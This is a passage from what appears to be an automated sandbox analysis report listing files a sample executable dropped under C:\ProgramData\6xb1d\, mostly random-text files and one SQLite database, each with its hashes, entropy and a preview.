                                                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\gdba16

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                                                          MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                                                          SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                                                          SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                                                          SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\glfuas

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\gva1no

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                                                                          MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                                                                          SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                                                                          SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                                                                          SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\hlfctr

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                                                                          MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                                                                          SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                                                                          SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                                                                          SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\jwb1v3

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                                                          MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                                                          SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                                                          SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                                                          SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\k6xt0z

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                                                                          MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                                                                          SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                                                                          SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                                                                          SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\l68gdj

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                                                          MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                                                          SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                                                          SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                                                          SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\mgd2v3

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.2658184469363398
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:KrJ/2qOB1nxCkM8SAELyKOMq+8ETZKoxAXCVum28:K0q+n0J89ELyKOMq+8ET8cUV8
                                                                                                                                                                                                                                                                                          MD5:DF29069D27197D4616C3E55AF460A04F
                                                                                                                                                                                                                                                                                          SHA1:2925821CE2561784300D9201027F584B53BA53B3
                                                                                                                                                                                                                                                                                          SHA-256:093D2160FF3BF9A4204430032C5FEBF22CDA497114F9EB3AA461858429B2EA34
                                                                                                                                                                                                                                                                                          SHA-512:B5950B50D851DF2F65F610BF5A55FEB218EA08C954ECC0D8090CD94D6349E9CA9F17EB1C5F5B716E36CAA4333325FA097E1105FC2FE30C2D4A3ACBAE2C637A12
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\mycjw4

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                                                          Malicious:false
